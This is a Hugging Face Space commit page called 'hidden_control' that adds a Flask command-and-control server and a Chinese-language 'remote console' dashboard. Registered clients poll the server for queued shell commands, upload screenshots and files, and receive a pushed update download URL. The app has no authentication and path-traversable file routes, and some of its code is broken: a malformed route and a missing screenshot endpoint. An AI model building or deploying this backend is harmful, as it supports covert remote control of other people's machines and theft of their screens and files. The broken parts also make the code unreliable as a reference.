Spaces:

profile114
/

hidden_control

Sleeping

App Files Files Community

profile114 commited on Mar 6

Commit

0d394ca

verified ·

1 Parent(s): 5acfbe3

Upload 3 files

Browse files

Files changed (3) hide show

app.py +278 -0
requirements.txt +1 -0
templates/index.html +289 -0

app.py ADDED Viewed

	@@ -0,0 +1,278 @@

+#!/usr/bin/env python3
+import os
+import sqlite3
+import uuid
+import json
+import time
+from datetime import datetime
+from flask import Flask, request, jsonify, send_file, render_template
+from werkzeug.utils import secure_filename
+app = Flask(__name__)
+DB_PATH = os.environ.get('DB_PATH', 'data.db')
+UPLOAD_DIR = os.environ.get('UPLOAD_DIR', 'uploads')
+os.makedirs(f'{UPLOAD_DIR}/screenshots', exist_ok=True)
+os.makedirs(f'{UPLOAD_DIR}/files', exist_ok=True)
+def init_db():
+    conn = sqlite3.connect(DB_PATH)
+    c = conn.cursor()
+    c.execute('''
+        CREATE TABLE IF NOT EXISTS clients (
+            id TEXT PRIMARY KEY,
+            name TEXT,
+            status TEXT DEFAULT 'offline',
+            last_seen TEXT,
+            version TEXT,
+            os TEXT,
+            ip TEXT
+        )
+    ''')
+    c.execute('''
+        CREATE TABLE IF NOT EXISTS commands (
+            id TEXT PRIMARY KEY,
+            client_id TEXT,
+            type TEXT,
+            payload TEXT,
+            status TEXT DEFAULT 'pending',
+            result TEXT,
+            created_at TEXT,
+            FOREIGN KEY(client_id) REFERENCES clients(id)
+        )
+    ''')
+    c.execute('''
+        CREATE TABLE IF NOT EXISTS files (
+            id TEXT PRIMARY KEY,
+            client_id TEXT,
+            filename TEXT,
+            size INTEGER,
+            uploaded_at TEXT,
+            FOREIGN KEY(client_id) REFERENCES clients(id)
+        )
+    ''')
+    c.execute('''
+        CREATE TABLE IF NOT EXISTS configs (
+            key TEXT PRIMARY KEY,
+            value TEXT,
+            updated_at TEXT
+        )
+    ''')
+    conn.commit()
+    conn.close()
+def get_db():
+    conn = sqlite3.connect(DB_PATH)
+    conn.row_factory = sqlite3.Row
+    return conn
+@app.route('/api/client/register', methods=['POST'])
+def register_client():
+    data = request.get_json()
+    client_id = data.get('id') or str(uuid.uuid4())
+    name = data.get('name', 'Unknown')
+    version = data.get('version', '')
+    os_info = data.get('os', '')
+    conn = get_db()
+    conn.execute('''
+        INSERT OR REPLACE INTO clients (id, name, status, last_seen, version, os, ip)
+        VALUES (?, ?, 'online', ?, ?, ?, ?)
+    ''', (client_id, name, datetime.now().isoformat(), version, os_info, request.remote_addr))
+    conn.commit()
+    conn.close()
+    return jsonify({'id': client_id, 'name': name, 'status': 'online'})
+@app.route('/api/client/heartbeat', methods=['POST'])
+def heartbeat():
+    data = request.get_json()
+    client_id = data.get('client_id')
+    conn = get_db()
+    conn.execute("UPDATE clients SET last_seen = ?, status = 'online' WHERE id = ?",
+                 (datetime.now().isoformat(), client_id))
+    cmd = conn.execute('''
+        SELECT id, client_id, type, payload, status FROM commands
+        WHERE client_id = ? AND status = 'pending'
+        ORDER BY created_at ASC LIMIT 1
+    ''', (client_id,)).fetchone()
+    conn.commit()
+    conn.close()
+    if cmd:
+        return jsonify({'commands': [dict(cmd)]})
+    return jsonify({'commands': []})
+@app.route('/api/command', methods=['POST'])
+def send_command():
+    data = request.get_json()
+    cmd_id = str(uuid.uuid4())
+    client_id = data.get('client_id')
+    cmd_type = data.get('type', 'shell')
+    payload = data.get('payload', '')
+    conn = get_db()
+    conn.execute('''
+        INSERT INTO commands (id, client_id, type, payload, status, created_at)
+        VALUES (?, ?, ?, ?, 'pending', ?)
+    ''', (cmd_id, client_id, cmd_type, payload, datetime.now().isoformat()))
+    conn.commit()
+    conn.close()
+    return jsonify({'id': cmd_id, 'status': 'pending'})
+@app.route('/api/command/result', methods=['POST'])
+def command_result():
+    data = request.get_json()
+    cmd_id = data.get('command_id')
+    result = data.get('result', '')
+    status = data.get('status', 'completed')
+    conn = get_db()
+    conn.execute("UPDATE commands SET result = ?, status = ? WHERE id = ?",
+                 (result, status, cmd_id))
+    conn.commit()
+    conn.close()
+    return jsonify({'status': 'ok'})
+@app.route('/api/screenshot', methods=['POST'])
+def upload_screenshot():
+    client_id = request.form.get('client_id')
+    if not client_id:
+        return jsonify({'error': 'client_id required'}), 400
+    if 'screenshot' not in request.files:
+        return jsonify({'error': 'no file'}), 400
+    file = request.files['screenshot']
+    if file.filename == '':
+        return jsonify({'error': 'empty filename'}), 400
+    ext = os.path.splitext(file.filename)[1] or '.jpg'
+    filename = f'{client_id}_{int(time.time())}{ext}'
+    filepath = f'{UPLOAD_DIR}/screenshots/{filename}'
+    file.save(filepath)
+    conn = get_db()
+    conn.execute("UPDATE clients SET last_seen = ? WHERE id = ?",
+                 (datetime.now().isoformat(), client_id))
+    conn.commit()
+    conn.close()
+    return jsonify({'url': f'/uploads/screenshots/{filename}'})
+@app.route('/api/file/upload', methods=['POST'])
+def upload_file():
+    client_id = request.form.get('client_id')
+    if not client_id:
+        return jsonify({'error': 'client_id required'}), 400
+    if 'file' not in request.files:
+        return jsonify({'error': 'no file'}), 400
+    file = request.files['file']
+    filename = secure_filename(file.filename)
+    if filename == '':
+        return jsonify({'error': 'empty filename'}), 400
+    save_filename = f'{client_id}_{filename}'
+    filepath = f'{UPLOAD_DIR}/files/{save_filename}'
+    file.save(filepath)
+    file_id = str(uuid.uuid4())
+    conn = get_db()
+    conn.execute('''
+        INSERT INTO files (id, client_id, filename, size, uploaded_at)
+        VALUES (?, ?, ?, ?, ?)
+    ''', (file_id, client_id, filename, os.path.getsize(filepath), datetime.now().isoformat()))
+    conn.commit()
+    conn.close()
+    return jsonify({'id': file_id, 'filename': save_filename})
+@app.route('/api/file/download', methods=['GET'])
+def download_file():
+    filename = request.args.get('filename')
+    if not filename:
+        return jsonify({'error': 'filename required'}), 400
+    return send_file(f'{UPLOAD_DIR}/files/{filename}')
+@app.route('/api/clients', methods=['GET'])
+def get_clients():
+    conn = get_db()
+    clients = conn.execute('SELECT * FROM clients ORDER BY last_seen DESC').fetchall()
+    conn.close()
+    return jsonify([dict(row) for row in clients])
+@app.route('/api/commands', methods=['GET'])
+def get_commands():
+    client_id = request.args.get('client_id')
+    if not client_id:
+        return jsonify({'error': 'client_id required'}), 400
+    conn = get_db()
+    commands = conn.execute('''
+        SELECT * FROM commands WHERE client_id = ? ORDER BY created_at DESC
+    ''', (client_id,)).fetchall()
+    conn.close()
+    return jsonify([dict(row) for row in commands])
+@app.route('/api/config', methods=['GET'])
+def get_config():
+    conn = get_db()
+    configs = conn.execute('SELECT key, value FROM configs').fetchall()
+    conn.close()
+    config = {
+        'server_url': os.environ.get('SERVER_URL', request.host_url),
+        'poll_interval': 5,
+        'auto_update': True,
+        'latest_version': '1.0.0',
+        'download_url': ''
+    }
+    for row in configs:
+        if row['key'] == 'latest_version':
+            config['latest_version'] = row['value']
+        elif row['key'] == 'download_url':
+            config['download_url'] = row['value']
+    return jsonify(config)
+@app.route('/api/config/update', methods=['POST'])
+def update_config():
+    data = request.get_json()
+    conn = get_db()
+    if data.get('latest_version'):
+        conn.execute('''
+            INSERT OR REPLACE INTO configs (key, value, updated_at)
+            VALUES (?, ?, ?)
+        ''', ('latest_version', data['latest_version'], datetime.now().isoformat()))
+    if data.get('download_url'):
+        conn.execute('''
+            INSERT OR REPLACE INTO configs (key, value, updated_at)
+            VALUES (?, ?, ?)
+        ''', ('download_url', data['download_url'], datetime.now().isoformat()))
+    conn.commit()
+    conn.close()
+    return jsonify({'status': 'ok'})
+@app.route('/')
+def index():
+    return render_template('index.html')
+@app.route('/uploads/<path:filename)')
+def serve_upload(filename):
+    return send_file(f'{UPLOAD_DIR}/{filename}')
+if __name__ == '__main__':
+    init_db()
+    port = int(os.environ.get('PORT', 8080))
+    print(f'Server running on port {port}')
+    app.run(host='0.0.0.0', port=port, debug=False)

requirements.txt ADDED Viewed

	@@ -0,0 +1 @@


1	+ Flask>=2.0.0

templates/index.html ADDED Viewed

	@@ -0,0 +1,289 @@

+<!DOCTYPE html>
+<html lang="zh-CN">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>远程控制台</title>
+    <style>
+        * { margin: 0; padding: 0; box-sizing: border-box; }
+        body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: #1a1a2e; color: #eee; min-height: 100vh; }
+        .container { max-width: 1400px; margin: 0 auto; padding: 20px; }
+        h1 { text-align: center; margin-bottom: 30px; color: #00d9ff; }
+        .clients-section { margin-bottom: 30px; }
+        .section-title { font-size: 1.2em; margin-bottom: 15px; color: #aaa; }
+        .clients-grid { display: grid; grid-template-columns: repeat(auto-fill, minmax(280px, 1fr)); gap: 15px; }
+        .client-card { background: #16213e; border-radius: 10px; padding: 15px; border: 1px solid #0f3460; cursor: pointer; transition: all 0.3s; }
+        .client-card:hover { border-color: #00d9ff; transform: translateY(-2px); }
+        .client-card.selected { border-color: #00d9ff; background: #1f4068; }
+        .client-card.offline { opacity: 0.5; }
+        .client-name { font-size: 1.1em; font-weight: bold; margin-bottom: 8px; }
+        .client-info { font-size: 0.85em; color: #888; }
+        .client-status { display: inline-block; padding: 2px 8px; border-radius: 4px; font-size: 0.8em; margin-top: 8px; }
+        .status-online { background: #00d9ff22; color: #00d9ff; }
+        .status-offline { background: #ff6b6b22; color: #ff6b6b; }
+        .panel { background: #16213e; border-radius: 10px; padding: 20px; border: 1px solid #0f3460; display: none; }
+        .panel.active { display: block; }
+        .tabs { display: flex; gap: 10px; margin-bottom: 20px; border-bottom: 1px solid #0f3460; padding-bottom: 10px; }
+        .tab { padding: 8px 16px; border-radius: 5px; cursor: pointer; background: transparent; border: none; color: #888; transition: all 0.3s; }
+        .tab:hover { color: #00d9ff; }
+        .tab.active { background: #00d9ff; color: #1a1a2e; }
+        .command-input { display: flex; gap: 10px; margin-bottom: 15px; }
+        .command-input input { flex: 1; padding: 10px; border-radius: 5px; border: 1px solid #0f3460; background: #1a1a2e; color: #eee; }
+        .btn { padding: 10px 20px; border-radius: 5px; border: none; cursor: pointer; background: #00d9ff; color: #1a1a2e; font-weight: bold; }
+        .btn:hover { opacity: 0.9; }
+        .btn-danger { background: #ff6b6b; }
+        .output { background: #0a0a15; border-radius: 5px; padding: 15px; min-height: 200px; max-height: 400px; overflow-y: auto; font-family: monospace; white-space: pre-wrap; }
+        .screenshot-view { text-align: center; }
+        .screenshot-view img { max-width: 100%; border-radius: 5px; }
+        .file-list { margin-top: 15px; }
+        .file-item { display: flex; justify-content: space-between; padding: 10px; background: #0a0a15; border-radius: 5px; margin-bottom: 8px; }
+        .no-client { text-align: center; color: #666; padding: 50px; }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <h1>🖥️ 远程控制台</h1>
+        <div class="clients-section">
+            <div class="section-title">在线客户端</div>
+            <div class="clients-grid" id="clientsGrid"></div>
+        </div>
+        <div class="panel" id="controlPanel">
+            <div class="tabs">
+                <button class="tab active" data-tab="shell">Shell</button>
+                <button class="tab" data-tab="screenshot">截图</button>
+                <button class="tab" data-tab="files">文件</button>
+                <button class="tab" data-tab="webrtc">屏幕直播</button>
+                <button class="tab" data-tab="control">远程控制</button>
+            </div>
+            <div class="tab-content" id="tab-shell">
+                <div class="command-input">
+                    <input type="text" id="commandInput" placeholder="输入命令...">
+                    <button class="btn" onclick="sendCommand()">执行</button>
+                </div>
+                <div class="output" id="commandOutput">等待命令...</div>
+            </div>
+            <div class="tab-content" id="tab-screenshot" style="display:none;">
+                <button class="btn" onclick="requestScreenshot()">获取截图</button>
+                <div class="screenshot-view" id="screenshotView" style="margin-top:15px;"></div>
+            </div>
+            <div class="tab-content" id="tab-files" style="display:none;">
+                <div class="command-input">
+                    <input type="file" id="fileInput">
+                    <button class="btn" onclick="uploadFile()">上传</button>
+                </div>
+                <div class="file-list" id="fileList"></div>
+            </div>
+            <div class="tab-content" id="tab-webrtc" style="display:none;">
+                <button class="btn" onclick="startScreenShare()">开始屏幕直播</button>
+                <button class="btn btn-danger" onclick="stopScreenShare()">停止</button>
+                <div id="webrtcView" style="margin-top:15px;"></div>
+            </div>
+            <div class="tab-content" id="tab-control" style="display:none;">
+                <p style="color:#888;margin-bottom:15px;">移动鼠标或按下按键将同步到客户端</p>
+                <div id="remoteView" style="pointer-events:auto;cursor:crosshair;"></div>
+            </div>
+        </div>
+        <div class="no-client" id="noClient">
+            请选择一个客户端
+        </div>
+    </div>
+    <script>
+        let selectedClient = null;
+        let pollInterval = null;
+        let webrtcPeer = null;
+        const API_BASE = window.location.origin;
+        async function loadClients() {
+            try {
+                const resp = await fetch(API_BASE + '/api/clients');
+                const clients = await resp.json();
+                const grid = document.getElementById('clientsGrid');
+                grid.innerHTML = '';
+                clients.forEach(client => {
+                    const card = document.createElement('div');
+                    card.className = 'client-card' + (client.status === 'offline' ? ' offline' : '');
+                    card.onclick = () => selectClient(client);
+                    const lastSeen = new Date(client.last_seen).toLocaleString();
+                    card.innerHTML = `
+                        <div class="client-name">${client.name || 'Unknown'}</div>
+                        <div class="client-info">ID: ${client.id}</div>
+                        <div class="client-info">Version: ${client.version || 'N/A'}</div>
+                        <div class="client-info">OS: ${client.os || 'N/A'}</div>
+                        <div class="client-status ${client.status === 'online' ? 'status-online' : 'status-offline'}">${client.status}</div>
+                        <div class="client-info">最后活跃: ${lastSeen}</div>
+                    `;
+                    grid.appendChild(card);
+                });
+            } catch(e) {
+                console.error('Load clients error:', e);
+            }
+        }
+        function selectClient(client) {
+            selectedClient = client;
+            document.querySelectorAll('.client-card').forEach(c => c.classList.remove('selected'));
+            event.target.closest('.client-card').classList.add('selected');
+            document.getElementById('controlPanel').classList.add('active');
+            document.getElementById('noClient').style.display = 'none';
+            startPolling();
+        }
+        function startPolling() {
+            if (pollInterval) clearInterval(pollInterval);
+            pollInterval = setInterval(pollCommands, 2000);
+        }
+        async function pollCommands() {
+            if (!selectedClient) return;
+            try {
+                const resp = await fetch(API_BASE + '/api/client/heartbeat', {
+                    method: 'POST',
+                    headers: {'Content-Type': 'application/json'},
+                    body: JSON.stringify({client_id: selectedClient.id})
+                });
+                const data = await resp.json();
+                if (data.commands && data.commands.length > 0) {
+                    data.commands.forEach(cmd => executeCommand(cmd));
+                }
+            } catch(e) {
+                console.error('Poll error:', e);
+            }
+        }
+        async function executeCommand(cmd) {
+            const output = document.getElementById('commandOutput');
+            switch(cmd.type) {
+                case 'shell':
+                    output.textContent = '执行: ' + cmd.payload + '\n';
+                    break;
+                case 'screenshot':
+                    requestScreenshot();
+                    break;
+                case 'file_list':
+                    loadFileList();
+                    break;
+            }
+            await fetch(API_BASE + '/api/command/result', {
+                method: 'POST',
+                headers: {'Content-Type': 'application/json'},
+                body: JSON.stringify({command_id: cmd.id, status: 'executed'})
+            });
+        }
+        async function sendCommand() {
+            const input = document.getElementById('commandInput');
+            const cmd = input.value.trim();
+            if (!cmd || !selectedClient) return;
+            await fetch(API_BASE + '/api/command', {
+                method: 'POST',
+                headers: {'Content-Type': 'application/json'},
+                body: JSON.stringify({
+                    client_id: selectedClient.id,
+                    type: 'shell',
+                    payload: cmd
+                })
+            });
+            input.value = '';
+        }
+        async function requestScreenshot() {
+            if (!selectedClient) return;
+            await fetch(API_BASE + '/api/command', {
+                method: 'POST',
+                headers: {'Content-Type': 'application/json'},
+                body: JSON.stringify({
+                    client_id: selectedClient.id,
+                    type: 'screenshot',
+                    payload: ''
+                })
+            });
+            setTimeout(loadScreenshot, 1000);
+        }
+        async function loadScreenshot() {
+            const view = document.getElementById('screenshotView');
+            view.innerHTML = '<img src="' + API_BASE + '/api/clients/' + selectedClient.id + '/screenshot?t=' + Date.now() + '">';
+        }
+        async function uploadFile() {
+            const input = document.getElementById('fileInput');
+            if (!input.files[0] || !selectedClient) return;
+            const formData = new FormData();
+            formData.append('file', input.files[0]);
+            formData.append('client_id', selectedClient.id);
+            await fetch(API_BASE + '/api/file/upload', {
+                method: 'POST',
+                body: formData
+            });
+            alert('文件已上传');
+        }
+        function loadFileList() {
+            document.getElementById('fileList').innerHTML = '<div style="color:#888;">等待文件列表...</div>';
+        }
+        function startScreenShare() {
+            const view = document.getElementById('webrtcView');
+            view.innerHTML = '<p style="color:#888;">屏幕直播功能开发中...</p>';
+        }
+        function stopScreenShare() {
+            document.getElementById('webrtcView').innerHTML = '';
+        }
+        document.querySelectorAll('.tab').forEach(tab => {
+            tab.onclick = () => {
+                document.querySelectorAll('.tab').forEach(t => t.classList.remove('active'));
+                document.querySelectorAll('.tab-content').forEach(c => c.style.display = 'none');
+                tab.classList.add('active');
+                document.getElementById('tab-' + tab.dataset.tab).style.display = 'block';
+            };
+        });
+        document.getElementById('commandInput').onkeypress = (e) => {
+            if (e.key === 'Enter') sendCommand();
+        };
+        loadClients();
+        setInterval(loadClients, 5000);
+    </script>
+</body>
+</html>